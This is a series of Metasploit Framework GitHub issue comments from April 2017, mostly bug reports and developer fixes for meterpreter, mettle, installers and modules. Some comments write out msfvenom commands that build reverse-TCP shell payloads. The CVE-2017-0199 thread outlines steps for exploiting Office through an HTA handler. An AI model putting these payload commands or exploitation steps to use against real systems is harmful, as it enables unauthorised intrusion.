Tested on a  Windows 10 Pro 64 bits.

## Expected behavior

It should return true

## Current behavior

Returns false

### Metasploit version

metasploit v4.13.21-dev-cba5e

[2017-04-06 16:52] bwatters-r7 commented on #8202
This is bug in windows meterpreter, as we use `_wstat` in `metasploit-payloads/c/meterpreter/source/extensions/stdapi/server/fs/fs_win.c`

Switching to _wstat64 should solve the problem, but it looks like we dump the output into a custom structure, and we'll need to make sure that the `meterp_stat` struct will handle any changes in output.

[2017-04-06 17:00] bwatters-r7 commented on #8202
# Testing:
[code]

Code for anyone curious:
[code]

# Also of note:
There is an inconsistent reporting between x64 and x86 meterpreters:
x64 meterpreter:
[code]
x86 meterpreter:
[code]

[2017-04-06 17:46] itsmeroy2012 commented on #7129
Issue can be closed, Documentation has been done for this module. Will add the 'fixes' next time, Apologies @busterb @h00die

[2017-04-06 18:31] busterb commented on #7129
no worries

[2017-04-06 18:31] #7129 closed

[2017-04-06 22:14] itsmeroy2012 commented on #8060
I'm unable to reproduce this issue @leebaird . This will have the same fix as in the referenced issue #8061 right? @busterb

I modified the telnet_encrypt_overflow file:-
[code]

## Steps to produce:
[code]
Although I am not able to reproduce the issue but is this the proper fix? I'll put up a PR if acknowledged.

[2017-04-07 00:05] bwatters-r7 commented on #8202
FYI, the payloads portion was an easy fix.  I have a patched payload running on my dev machine that finds large files as expected, but it breaks framework's file size (because it now reports them in 64 bits, like it should).  Working through the TLV parsing in framework now to figure out that fix.

[2017-04-07 01:53] busterb commented on #8202
If you fix the sizes, would recommend fixing the uid/gid fields to be 32-bit too.

st_ino is also way too small to be useful, but I also can't find anything in tree that uses it. It might make sense to drop it and pad too.

[2017-04-07 01:56] busterb commented on #8202
I'd kind of recommend creating a new stat64 command and have msf use it if it exists, or use normal stat if it doesn't. That way we don't break payloads in the field, and you don't have to fix all the payloads simultaneously (you can stagger a bit). Just take advantage of the command auto-detection we do in stdapi, all meterpreters should support command enumeration now.

[2017-04-07 14:24] bwatters-r7 commented on #8202
@busterb that's a much better plan than I had, consider it <s>stolen</s> adopted.

[2017-04-07 16:10] mikealanni commented on #6740
@jduck I have android 4.2.2. will this work.... i'm interesting to check it for my honda car head unit and if this work then this is very scary as the attacker can change couple setting in the car

[2017-04-07 16:12] mikealanni commented on #6740
let me know what you want from me so I can get you the information. the device is locked and even I cannot enable developer setting or adb. worth to try and at least make people safer and update might needed

[2017-04-07 16:31] busterb commented on #6740
@mikealanni it is a considerable amount of work, though not impossible, to target the exploit at arbitrary devices, especially if the firmware files and/or the ability to root the device is missing. I imagine someone with enough financial / time resources could do it, but I think it would be on you to port your particular device to this exploit.

[2017-04-07 16:48] mikealanni commented on #6740
I wish I have code experience, have a little but I don't know how to get
libc base address... It is aosp 4.2.2.2 little hint on that and might
metaphor help me... Thanks

On April 7, 2017 11:32:23 AM Brent Cook <notifications@github.com> wrote:

[2017-04-07 16:53] #7921 closed

[2017-04-07 21:38] OJ commented on #8200
This is on my TODO List already, thanks for creating an issue for it. Pondering approaches to make this work in a sane way.

[2017-04-07 23:19] itsmeroy2012 commented on #7188
This issue has been solved in #8041  https://github.com/rapid7/metasploit-framework/pull/8041 ... Can be closed now. @mubix

[2017-04-07 23:21] busterb commented on #7188
thanks

[2017-04-07 23:21] #7188 closed

[2017-04-08 04:25] alimp5 commented on #7879
Dear  @busterb

Here you are:
https://pastebin.com/3UGj5svg

I'm waiting for a correct solution :(
Thanks

[2017-04-08 04:29] alimp5 commented on #7878
Here you are:

My uploaded python script on Paste-bin:
https://pastebin.com/NWKkmM13

Thanks

[2017-04-08 04:54] hktalent opened #8209 "mac os 10.12.4 bug"
os: mac os 10.12.4
$ ./msfupdate
[code]
[code]

but $ ./msfupdate
same .......
[code]

[2017-04-08 04:59] hktalent commented on #8209
[code]

[2017-04-08 05:24] hktalent commented on #8209
$ brew info zlib
[code]
add info
vi ~/.bash_profile
[code]

source  ~/.bash_profile
$ gem install grpc -v '1.2.2'
Successfully installed grpc-1.2.2-universal-darwin
Done installing documentation for grpc after 0 seconds
1 gem installed

 ln -s /usr/local/lib/ruby/gems/2.4.0/gems/grpc-1.2.2-universal-darwin /usr/local/lib/ruby/gems/2.4.0/gems/grpc-1.2.2

the same
................

[2017-04-08 06:52] ShadyAck opened #8210 "msfvenom not working"
## Steps to reproduce

How'd you do it?

msfupdate

## Expected behavior

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=443 -f exe > shell.exe

create shell.exe

## Current behavior

[code]

I tried alternative

[code]

## System stuff

### Metasploit version
Framework: 4.14.9-dev-
Console  : 4.14.9-dev-

### I installed Metasploit with:
- [ ] It came pre-loaded

### OS

L

[2017-04-08 11:25] busterb commented on #8209
Why are you running ./msfupdate when you checked out the code manually? What are you trying to accomplish?

[2017-04-08 11:29] busterb commented on #8209
I'd suggest if you're doing development that you use RVM for installing Ruby rather than trying to use homebrew or system ruby. If you are not doing development, please use our nightly installer packages instead:

https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

[2017-04-08 12:02] busterb commented on #8210
Hmm, similar setup here, but running 64-bit. Works fine:

[code]

[2017-04-08 12:09] busterb commented on #8210
Hmm, works fine in 32-bit Kali as well:

[code]

[2017-04-08 12:11] busterb commented on #8210
Can you give any more information? What is your shell? What is LANG set to? Sounds like a problem passing arguments from the command wrapper, but I can't repro with the default Kali environment.

[2017-04-08 16:50] nethunter007 commented on #7814
need learn metasploit on termux
im just have termux
i dont have pc/notbook/ or computer device
please help me build metasploit on termux

[2017-04-08 16:51] hktalent commented on #8209
@busterb
yes i run $ ./msfupdate

[2017-04-08 17:08] hktalent commented on #8209
@busterb
$ gem install grpc -v '1.2.2'
[code]
$ gem list grpc
[code]

[2017-04-08 17:10] hktalent commented on #8209
@busterb
$ rvm use system --default
[code]
$brew info ruby
[code]

[2017-04-08 18:21] busterb commented on #7814
well, ruby 2.4 support landed last week. For termux, you need to work with the developer of that distribution to build metasploit packages, since we need more than just ruby 2.4. See https://github.com/termux/termux-packages

[2017-04-08 18:21] #7814 closed

[2017-04-08 18:25] busterb commented on #8209
Please stop using msfupdate if you're doing a git checkout. Just type the command 'bundle' and that should be all you need to do.

I'm inclined to move forward with deleting 'msfupdate' from the git tree entirely. It's also really annoying that grpc builds with -Werror. Who does that in shipped packages? It's a real distribution anti-pattern.

[2017-04-08 19:47] ShadyAck commented on #8210
Thank you for the reply.  I have tried reproducing the issue with my rebuild, but I come up empty.

When investigating the "Could not find activesupport-4.2.8 in any of the sources (Bundler::GemNotFound)" error I did notice that these do not exist:
/usr/lib/dradis/engines/dradis-api/Gemfile
/usr/lib/dradis/Gemfile
/usr/lib/dradis/Gemfile.lock
/usr/lib/dradis/Gemfile.plugins
/usr/lib/dradis/Gemfile

[2017-04-08 20:06] ShadyAck commented on #8210
Holy Cow!, the entire /usr/share/metasploit-framework folder is empty.  Only the config folder remains with  the database.yml file inside.  0_o

[2017-04-08 21:19] busterb commented on #8210
That's entirely expected considering you replaced the Kali Linux native metasploit-framework package with the Rapid7 one. Only Kali installs metasploit into /usr/share, the Rapid7 one installs into /opt/metasploit-framework.

Tell you what, since you're on Kali, the only real supported thing to do is to use Kali's version of Metasploit, since it has special configuration for its packages. Do this:

[2017-04-08 21:21] busterb commented on #8210
The reason why you got all of the messages about missing gems is that, neither the Kali packages nor the Rapid7 packages install the ruby gemset needed by metasploit in the system context. Instead there is a special gemset location, which is controlled by an environment variable. Take a peek at what '/usr/bin/msfconsole' really does, and you will see why you can't run the embedded binaries directl

[2017-04-08 22:18] ShadyAck commented on #8210
Man, I don't know where you get the patience for this support, but I appreciate you and the time you gave me.

[2017-04-09 03:49] #8209 closed

[2017-04-09 03:54] Auxilus commented on #7814
Well I've been using metasploit on termux for more than 2 months ... You have to compile it from source...Gem installation will fail for nokogiri and network-interface which you can fix by checking respective issues on https://github.com/termux/termux-packages/issues

[2017-04-09 03:55] Auxilus commented on #7814
Dev is trying to package it for cross-compilation

[2017-04-09 10:20] FireFart opened #8211 "Latest metasploit-framework not working inside docker (broken pipe)"
Currently getting the following error message when building and running the docker image. Tested on OSX and Fedora:

[code]

[2017-04-09 10:29] FireFart commented on #8211
Pinging @acammack-r7 because he wrote the conflicting code. Would be great if you can have a look.

[2017-04-09 16:26] busterb commented on #8211
It's kind of weird how the error only occurs the 2nd time you run the docker image, not the first, so I didn't notice it at first. Also including a bogus hashbang path in the module didn't reproduce the issue either. Should be easy to fix though.

[2017-04-09 16:38] busterb commented on #8211
Hmm, if the module fails to load quickly enough, the exception does get caught quickly and logged to framework.log:

[code]

[2017-04-09 16:52] FireFart commented on #8211
@busterb oh I missed this log entry. It looks like there is a python module with this name checked in, but the framework assumes the .rb extension:
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/smtp/haraka.py

[2017-04-09 16:54] FireFart commented on #8211
@busterb If I delete the file the container starts as it should

[2017-04-09 16:57] busterb commented on #8211
I just submitted a PR to handle the exception when the module disconnects while running. I think we expected the ENOENT check to work inside of docker too, but it didn't for some reason, maybe due to different behavior of ruby or /usr/bin/env

[2017-04-09 17:02] busterb commented on #8211
The root cause appears to be the difference in how /usr/bin/env works in busybox vs native OS X / coreutils. We probably wouldn't have noticed if the docker image were based on something other than alpine

lrwxrwxrwx    1 root     root            12 Mar 30 22:29 /usr/bin/env -> /bin/busybox

[2017-04-09 22:09] corefx opened #8213 "Module request: CVE-2017-7581"
SQL injection vulnerability in NewsController.php in the News module 5.3.2 and earlier for TYPO3 allows unauthenticated users to execute arbitrary SQL commands via vectors involving overwriteDemand for order and OrderByAllowed. Since this TYPO3 module is quite popular it might be useful to have a Metasploit module for this vulnerability.
Details and PoC exploit: [https://www.ambionics.io/blog/typo

[2017-04-10 15:51] busterb commented on #8210
No problem. I'm pretty interested in making sure that users of the Rapid7 package get a smooth experience. Sorry this didn't work out for you, I'd be interested to sometime know what was different about your environment.

[2017-04-10 16:13] busterb opened #8215 "importing hosts from masscan results generates a lot of bogus errors in framework.log"
## Steps to reproduce

How'd you do it?

1. use masscan to scan a netwlr
2. import resulting XML
3. observe a ton of these:

[code]

## Expected behavior

framework.log should only have exceptional stuff in it

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.j

[2017-04-11 00:38] #7137 closed

[2017-04-11 01:14] Viss opened #8219 "mettle gets disconnected from msf when 'ps' is run in a certain environment"
## Steps to reproduce

How'd you do it?

1. generate a mettle payload (linux/mettle/reverse_tcp)
2. obtain a shell
3. once in shell, type 'sysinfo' or 'help, it seems to function
4. type 'ps' and the binary crashes and the shell dies.

It would appear the problem is with the binary itself, not msf on the attack side.

### Metasploit version
Framework: 4.14.6-dev-11b251b
Console  : 4.14.6-dev-11b25

[2017-04-11 01:19] h00die commented on #8219
from IRC tonight:
<Viss> linux box, ubuntu super old kernel, 3.13, i686
./msfvenom -p linux/x86/mettle/reverse_tcp LHOST=xxx LPORT=xxx -f elf -a x86

[2017-04-11 03:15] busterb commented on #8219
Hmm, running on 3.2 here, works fine. Even just ran autoroute, which probably should have been in 'multi' in the first place, since there's nothing OS-specific about it at all.

[code]

[2017-04-11 03:18] busterb commented on #8219
Can you get an idea of what 'ps' or 'route' would be on this target device (perhaps via a different means)? I suspect it has much less to do with target architecture, and more to do with doing something funning in the process parser for some particular workload on your target.

[2017-04-11 03:39] nixawk opened #8220 "CVE-2017-0199 - exploit office with ole link object"
![](https://securingtomorrow.mcafee.com/wp-content/uploads/2017/04/image1.png)

![](https://securingtomorrow.mcafee.com/wp-content/uploads/2017/04/image2.png)

## References

1. https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/
2. https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html
3. https://www.helpnetsecurity.com/2017/04/10

[2017-04-11 03:59] Viss commented on #8219
well it's just an older ubuntu box.

![image](https://cloud.githubusercontent.com/assets/1756255/24892328/94606474-1e30-11e7-92be-89b354313a27.png)

[2017-04-11 04:05] Viss commented on #8219
![image](https://cloud.githubusercontent.com/assets/1756255/24892437/79edfd08-1e31-11e7-8bff-186cb77f4fae.png)

[2017-04-11 04:11] Viss commented on #8219
I'm now going to attempt msfupdate to bring this install to absolute current to see if that matters.

[2017-04-11 04:12] busterb commented on #8219
-h isn't working from the meterpreter script either? that's also odd. msf is running in linux? osx?

[2017-04-11 04:13] Viss commented on #8219
![image](https://cloud.githubusercontent.com/assets/1756255/24892577/7a7a96fe-1e32-11e7-9cf9-e14b9344989d.png)

[2017-04-11 04:15] Viss commented on #8219
err, well these errors are actually from python meterpreter. this issue is about mettle just 'dying', let me go back and get proper screenshots for mettle.

[2017-04-11 04:16] Viss commented on #8219
same error
![image](https://cloud.githubusercontent.com/assets/1756255/24892631/f57d41bc-1e32-11e7-87fc-2a75279b399d.png)

[2017-04-11 04:17] Viss commented on #8219
whoa, okay, it seems to work via the postmodule when outside of meterp
![image](https://cloud.githubusercontent.com/assets/1756255/24892645/0a3066ac-1e33-11e7-92cd-9e0ec08c2d4f.png)

[2017-04-11 04:17] busterb commented on #8219
yeah - the meterpreter script seems to have 'usage()' defined in the wrong place. that's an easy fix

[2017-04-11 04:20] busterb commented on #8219
2 items resolved in #8221

[2017-04-11 04:20] Viss commented on #8219
if you do 'ps' on your end in a mettle shell does it murder the shell? cuz on this instance it segfaults.

[2017-04-11 04:24] busterb commented on #8219
nope, but it might be failing parsing a specific process on this target host that I don't have (it's a pretty bare Ubuntu 12.04 install)

[2017-04-11 04:26] busterb commented on #8219
Hmm, just realized I'm running a 32-bit payload on a 64-bit host, will try switching to all 32-bit.
If you can upload a stageless payload, we can enable debug further:

./msfvenom -p linux/x86/mettle_reverse_tcp LHOST=xxx LPORT=xxx -f elf -a x86

Then run the payload with '-dd' as command-line flags. It should log everything that's happening.

[2017-04-11 04:26] Viss commented on #8219
okiedokie

[2017-04-11 04:40] Viss commented on #8219
so via stdout i get some text, but I can't get it to give me any data via regular redirection.
I do see that its being 'killed', and I see this in kern.log

`kernel: [20889.374880] mettle[3057]: segfault at b ip bf9e2c15 sp bf9e2c4c error 6`

[2017-04-11 04:40] busterb commented on #8219
Well, that still works for me too. Will play with better ways to murder the process lister tomorrow.

[2017-04-11 04:41] Viss commented on #8219
im having REAL trouble trying to get it to redirect output. is there a possibility you could create a flag that would have it write to a file on its own vs stdout?

[2017-04-11 04:42] busterb commented on #8219
got you covered, use the '-o' flag
[code]

[2017-04-11 04:43] Viss commented on #8219
hot. standby

[2017-04-11 04:45] Viss commented on #8219
this is the bottom bit of the log, omitting ips and whatnot.

[code]

[2017-04-11 04:49] busterb commented on #8219
Huh, its actually getting a shutdown message from msf. Committing a SIGSEGV is the 3rd thing it will try to kill itself with, if exit(0) and SIGKILL don't occur in time.

[2017-04-11 04:51] Viss commented on #8219
thats... bizzare

[2017-04-11 04:52] busterb commented on #8219
could you put a stack trace in msf's core_shutdown method so we could see who dunnit? Add a line like this:

[code]

[2017-04-11 06:13] Viss commented on #8219
I made this change but I'm not sure where I'm supposed to see output. No extra errors or logs show up in msfconsole and the output in the mettle debug log appears exactly the same.

[2017-04-11 08:19] m4hmoud opened #8222 "Rex::RuntimeError The core_loadlib request failed with result: 1"
## Steps to reproduce

1. Downloaded the [put_user exploit](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/android/local/put_user_vroot.rb)
2. Added the file to ~/.msf4/modules/exploits/android/local
3. Created a session on an Android 4.2.2 device
4. Set the options (LHOST, ...)
5. Run the exploit

## Expected behavior

I expected the exploit to run successfully as the

[2017-04-11 08:48] timwr commented on #8222
hi @m4hmoud
Can you follow the instructions here: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/android/local/put_user_vroot.md
You don't need to download the file and put it in ~/.msf4/ because it's already there, you can simply use it with:
`use exploit/android/local/put_user_vroot`
After than can you post the full log (including `sessions -v`) and `sho

[2017-04-11 11:43] busterb commented on #8219
Interesting. This was supposed to have shown a stack trace when the core_shutdown command was sent from msf. This is a live target right? I wonder if the core_shutdown is being injected by an intermediary.

[code]

[2017-04-11 14:23] rwincey opened #8226 "Metasploit fails to load - /tmp/module file collision - Multi-user environment"
## Steps to reproduce

Run msfconsole on the same system under two nonprivileged users.

## Expected behavior

Metasploit starts

## Current behavior

The following stack trace is the result of a file getting created by a user upon startup in the /tmp directory that is never deleted. Thus when a second user tries to run metasploit, it tries to clobber that file and metasploit fails to load. I'm no

[2017-04-11 14:24] busterb commented on #8226
Thanks, we'll get this fixed soon.

[2017-04-11 14:59] m4hmoud commented on #8222
thanks for the reply @timwr

At first I tried using it directly, but it wasn't in the list of exploits! Even after upgrading the metasploit (with `msfupgrade`), it still couldn't load the module and it the only `android/local` exploit in the list was `futex_requeue`.

So, my only option was adding it manually to the mentioned folder.

---------------------------------------------------------------

[2017-04-11 15:53] #8226 closed

[2017-04-11 17:08] rwincey commented on #8226
Thanks for the quick fix.

[2017-04-11 18:23] Viss commented on #8219
yes, it's a live target. I still have a shell.
i changed that one line in client_core.rb, restarted msf, tried again
let me give it one more shot.

[2017-04-11 18:24] Viss commented on #8219
ah, the change didn't take. the addition for like 595 didn't stick (?!?!)
trying again.

[2017-04-11 18:27] Viss commented on #8219
[code]

[2017-04-11 19:37] busterb commented on #8219
Is that the whole backtrace?

[2017-04-11 19:40] Viss commented on #8219
Yup, and then my other shells died.
I had to go pull that line out and restart msf.
![image](https://cloud.githubusercontent.com/assets/1756255/24927483/06fb43f4-1eb4-11e7-8a97-151fdd71cc0c.png)

[2017-04-11 20:02] busterb commented on #8219
That gives me a good clue then. Can you please run:

'set LogLevel 2'

and try again? Luckily the 3 sites where metasploit kills its own sessions have a unique debug log signature so I'll be able to see which one it is.

[2017-04-11 20:06] busterb commented on #8219
the actual log message may show up in framework.log. I suspect mettle is sending some piece of data that framework doesn't like, there is a mis-parse, then the connection gets shut down.

[2017-04-11 20:26] Viss commented on #8219
Same output to console:
[code]

This was in framework.log

[code]

[2017-04-12 01:02] brandonprry opened #8229 "loadpath doesn't report loading modules between 4.14.7 and 4.14.8"
## Steps to reproduce

How'd you do it?

1. Create modules directory that mirrors that of Metasploit (exploits, auxiliary, etc). Put some modules in it.
2. ```loadpath /path/to/your/modules``` should attempt to load the modules.

## Expected behavior
The number of modules and their types should be printed.

## Current behavior

Metasploit reports 0 modules loaded from the path. It seems to still l

[2017-04-12 02:41] nixawk commented on #8220
If regedit shows as

[code]

windows fails to execute payload. **StdOleLink** is the key.

## How to exploit the vulnerability ?

1. Setup a hta server.
2. Insert a package with hta url.

[2017-04-12 03:25] timwr commented on #8222
Do you have a broken install of metasploit? Can you try a fresh install?
[code]

[2017-04-12 03:59] nixawk commented on #8220
[code]

[2017-04-12 04:41] acammack-r7 commented on #8229
Thanks for the report! Let me know if the fix works for you.

[2017-04-12 05:16] greenhand2learn opened #8231 "mysql_hashdump can't login with blank password and error with high mysql version"
[code]
[code]

[2017-04-12 05:23] greenhand2learn opened #8232 "mysql_schemadump Error with DeniedError"
[code]

[2017-04-12 09:15] nixawk commented on #8220
## CVE-2017-0199 Copy

https://github.com/nixawk/labs/blob/master/CVE-2017-0199/template.doc

[2017-04-12 12:23] vysec commented on #8220
Have you got it working?

I host RTF and autolink then switch to HTA with application content type. Works fine this way.

Autolaunch too

[2017-04-12 12:59] brandonprry commented on #8229
This works for me. Thanks for the quick turn around.

[2017-04-12 14:02] nixawk commented on #8220
Could you show more details about your lab and office ver ?  I've tested it on windows 7, but failed.

[2017-04-12 16:11] darkbushido commented on #8042
if you want to create the test database it should be
`rake db:create:all db:migrate db:test:prepare`

[2017-04-12 16:51] #8229 closed

[2017-04-12 17:33] vysec commented on #8220
It appears to only work if I double click it still...

I serve the template.doc as a rtf and embed, then I change to
application/hta and it still needs me to "click" on the OLE to trigger.

I can't get the autolaunch working...

On Wed, Apr 12, 2017 at 3:02 PM, Vex Woo <notifications@github.com> wrote:

[2017-04-12 22:09] vysec commented on #8220
OK works fine now :)

[2017-04-13 01:06] nixawk commented on #8220
Is there a way to create a vulnerable docx with  metasploit ?

[2017-04-13 02:13] busterb commented on #8220
modules/exploits/windows/fileformat/office_word_macro.rb creates malicious .docx files, it just tweaks xml and zips it up.

[2017-04-13 05:06] vysec commented on #8220
I'll have a look after work

On Thu, 13 Apr 2017 at 03:13, Brent Cook <notifications@github.com> wrote:

[2017-04-13 09:34] nixawk commented on #8220
Thanks @vysec . https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/ is a good job.

----

## Failed to insert ole object

When you insert the object link, payload is executed. But **object failed to be embedded into the word file**.

![screen shot 2017-04-13 at 04 27 56](https://cloud.githubusercontent.com/assets/7352479/24999060/bbecab74-2001-11e7-8775-91f08b86c13d

[2017-04-13 12:02] n0l3ptr opened #8235 "Wmap Fails to Load with Ruby 2.4"
## Steps to reproduce
./msfconsole
load wmap

## Expected behavior
wmap plugin should load

## Current behavior
I receive the following error message:
Failed to load plugin from /home/shawn/git/metasploit-framework/plugins/wmap: cannot load such file -- xmlrpc/client

### Metasploit version
Framework: 4.14.11-dev-ced1412
Console  : 4.14.11-dev-ced1412

### I installed Metasploit with:
Source insta

[2017-04-13 12:12] busterb commented on #8235
Thanks, easy to fix.

[2017-04-13 12:14] busterb commented on #8235
See #8236 , it should fix it for you.

[2017-04-13 14:44] nixawk commented on #8220
<img width="654" alt="screen shot 2017-04-13 at 09 40 27" src="https://cloud.githubusercontent.com/assets/7352479/25009784/808e45e8-202d-11e7-8180-b36454dfa4a9.png">
<img width="656" alt="screen shot 2017-04-13 at 09 40 54" src="https://cloud.githubusercontent.com/assets/7352479/25009792/92432d12-202d-11e7-82bb-e93c56f275f3.png">
<img width="656" alt="screen shot 2017-04-13 at 09 42 10" src="https

[2017-04-13 22:53] #8235 closed

[2017-04-14 02:46] OJ opened #8239 "Meterpreter `getprivs` doesn't list all privs"
This issue might be Windows 10 only, but while playing around with <REDACTED> I found that Windbg lists different privs to what Meterpreter's `getprivs` command does.
[code]
In windbg I get:
[code]

I'm thinking these should be the same!

[2017-04-14 03:09] #8215 closed

[2017-04-14 03:14] #7555 closed

[2017-04-14 03:15] #8142 closed

[2017-04-14 07:50] FireFart opened #8240 "meterpreter, incognito and german windows"
We had the following problem on a recent pentest:
We got a meterpreter session to the target via MSSQL and tried to escalate our privileges using rotten potato. We got the impersonation token, but the full name of the account on a german windows server (it was 2008) the account is named: `NT-AUTHORITÄT\SYSTEM`.
Meterpreter can not handle the `Ä` as you can see in the following screenshot and it wa

[2017-04-14 08:58] nixawk commented on #8220
## Prase ole object

[code]

[code]

[2017-04-14 13:42] vysec commented on #8220
So I applied the patch... but the machine is still vulnerable... ???

On Fri, Apr 14, 2017 at 9:58 AM, Vex Woo <notifications@github.com> wrote:

[2017-04-14 16:41] netship01 commented on #8153
Same here on Android  7.1.1 meterpreter shell died just after shell created.

[2017-04-14 17:48] nixawk commented on #8220
CVE-2017-0199 module is created. Please wait more tests.

[code]

[code]

[2017-04-14 18:18] nixawk commented on #8220
[code]

[code]

[2017-04-14 18:32] busterb commented on #8220
Nice work @nixawk !

[2017-04-14 18:46] vysec commented on #8220
Nice work @nixawk :)

[2017-04-15 00:59] ouahibelhanchi commented on #8239
Indeed `getprivs` doesn't seem to obtain all possible privileges.

I have looked into it and found that `request_sys_config_getprivs` doesn't check for all privileges, it only checks for a subset of possible privileges. I have updated it to check all possible privileges.

Output after fix:

[code]

I will open an issue in `metasploit-payloads` repo and send fix.

[2017-04-15 03:49] demonsec666 commented on #8220
HI ！Man.Can you provide ms17_0199_rtf,rb code

[2017-04-15 03:49] demonsec666 commented on #8220
HI ！Man.Can you provide ms17_0199_rtf,rb code @nixawk

[2017-04-15 05:15] demonsec666 commented on #8220
ruby code？？ @nixawk

[2017-04-15 05:20] demonsec666 commented on #8220
metasploit？

[2017-04-15 07:45] wwebb-r7 commented on #8240
It's an umlaut, with the pronunciation of ah becoming ehh.  I have no idea how to help you with this computer hocus pocus though.

![](https://i.ytimg.com/vi/GD6qtc2_AQA/maxresdefault.jpg)

[2017-04-15 09:15] vysec commented on #8220
@demonsec666 I think Nixawk will submit as a PR. This isn' t a support thread.

https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/

[2017-04-15 10:31] busterb commented on #8240
This looks like an issue with your terminal emulator. What OS were you running metasploit under?

[2017-04-15 10:36] busterb commented on #8240
The best approach IMO is to convert the related APIs under Meterpreter where we're still using ASCII versions to Unicode. It's not too hard to do once they're identified.

One of the hard things about supporting numbered lists is maintaining state consistency between displaying the list and processing the command.

[2017-04-15 10:41] nixawk commented on #8220
I will. Please wait serval days.

[2017-04-15 11:14] busterb commented on #8240
Looks like we're doing a lot of comparisons of account names with the string literal 'NT AUTHORITY' too - we should switch those to use SID, which is consistent across localizations.

[2017-04-15 11:24] FireFart commented on #8240
@busterb Unicode in meterpreter would be awesome! In this example we used the default `windows/meterpreter/reverse_tcp` payload.
I thought the SID was already used for every account compare being made :/

So this issue can be split in two parts:
- Support Unicode in meterpreter
- Switch account compares to SID instead of the name

[2017-04-15 12:05] busterb commented on #8240
Yep. I'm elbow deep into unicode conversions:
[code]

[2017-04-15 16:05] demonsec666 commented on #8220
thanks @nixawk

[2017-04-16 00:11] gitmsf opened #8246 "metasploit v4.14.12-dev not show exploits when run msfconsole (kali)"
msfconsole

      =[ metasploit v4.14.12-dev-                        ]
+ -- --=[ 0 exploits - 0 auxiliary - 0 post               ]
+ -- --=[ 0 payloads - 0 encoders - 0 nops                ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >

but there is on directories:

/opt/metasploit-framework/embedded/framework/modules/

There is no way that metasploit finds them and can use it

[2017-04-16 12:10] 7sDream opened #8247 "Meterpreter load stdapi failed because of the missing of ext_server_stdapi.x64.dll"
## Steps to reproduce

How'd you do it?

1. Use msfvenom create a `windows/x64/meterpreter/reverse_tcp` payload dll file
2. Run the dll in RHOST(Windows 2008 SP1 x64), use ETERNALBLUE backdoor
3. Run multi/handler in msf, get a meterpreter shell successfully

## Expected behavior

Auto load stdapi, everything work like a charm.

## Current behavior

Auto load stdapi failed; Manual load failed too:

[2017-04-16 12:27] busterb commented on #8247
bah, I know what the problem is, fix incoming.

[2017-04-16 13:55] #8247 closed

[2017-04-16 13:56] busterb commented on #8247
it should be fixed now. Our automated builder has a bug in that it will release packages even if the windows binaries failed. I'll work on fixing this next.

[2017-04-16 14:04] busterb commented on #8246
It seems you are somehow using an odd hybrid of Rapid7's and Kali linux's package, and have gotten your system confused. Kali packages metasploit specifically to fit with the rest of the Kali ecosystem, I recommend using their packages on that system.

Please follow these instructions to fix your issue:

https://github.com/rapid7/metasploit-framework/issues/8210#issuecomment-292746380

[2017-04-16 14:04] #8246 closed

[2017-04-16 14:29] Akityo opened #8249 "what's the fucking problem with my metasploit"
## Steps to reproduce

How'd you do it?

I just want to install metasploit on my vps

/opt/metasploit-framework/embedded/lib/ruby/gems/2.3.0/gems/activesupport-4.2.8/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``': Cannot allocate memory - infocmp (Errno::ENOMEM)

i don't know why :(

[root@akityo ~]#uname -a
Linux akityo 3.16.0-4-amd64 #1 SMP Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 G

[2017-04-16 14:37] h00die commented on #8249
[code]

Issues are for reporting bugs, not receiving support. I would suggest joining the #metasploit IRC chan and asking there.5

[2017-04-16 14:37] #8249 closed

[2017-04-16 21:05] OJ commented on #8247
Strange. How come the build failed anyway? :(

On Apr 16, 2017 23:56, "Brent Cook" <notifications@github.com> wrote:

[2017-04-16 23:18] busterb commented on #8247
missing cast in 64-bit version that caused a warning -> error -> no binaries

[2017-04-16 23:21] busterb commented on #8247
the error reminded me that I needed fix winpmem as well, then I had a sad

[2017-04-17 00:24] OJ commented on #8247
Yeah i had that the other day too. It's messy :(

On Apr 17, 2017 09:21, "Brent Cook" <notifications@github.com> wrote:

[2017-04-17 00:48] #8222 closed

[2017-04-17 00:51] busterb commented on #8219
This is fixed by #8250. Was able to reproduce running mettle on an old zipit z2 instant messenger :)

[2017-04-17 00:51] #8219 closed

[2017-04-17 00:52] busterb commented on #8153
I reverted the bits in #8250. Seems that how packets are queued on the network affects whether this triggers or not.

[2017-04-17 00:52] #8153 closed

[2017-04-17 00:53] busterb commented on #8133
I reverted the commit in #8250, we'll try again later. Thanks.

[2017-04-17 00:53] #8133 closed

[2017-04-17 01:41] hktalent opened #8251 "mac os bug?"
mac os :10.12.4
metasploit v4.14.12-dev-601131c
$ gem -v
2.6.10
$ ruby -v
ruby 2.4.1p111 (2017-03-22 revision 58053) [x86_64-darwin16]

$ ./msfconsole
[code]
[code]

[2017-04-17 01:45] busterb commented on #8251
Nope, looks like a bug in the homebrew version of ruby:

[code]

Use RVM or report to the homebrew ruby package maintainers.

[2017-04-17 01:52] busterb commented on #8251
I'm seeing if there's a workaround in homebrew real quick too...

[2017-04-17 01:57] hktalent commented on #8251
@busterb
$ brew info sqlite3
[code]

[2017-04-17 01:58] hktalent commented on #8251
@busterb
[code]

[2017-04-17 02:40] busterb commented on #8251
I see. you may need to then purge your gems and rebuild, since this looks like a mismatch in your metasploit-framework gemset.

[2017-04-17 02:41] #8251 closed

[2017-04-17 02:48] wvu-r7 commented on #8198
Patches welcome.

[2017-04-17 02:48] #8198 closed

[2017-04-17 06:14] jamiehush commented on #7225
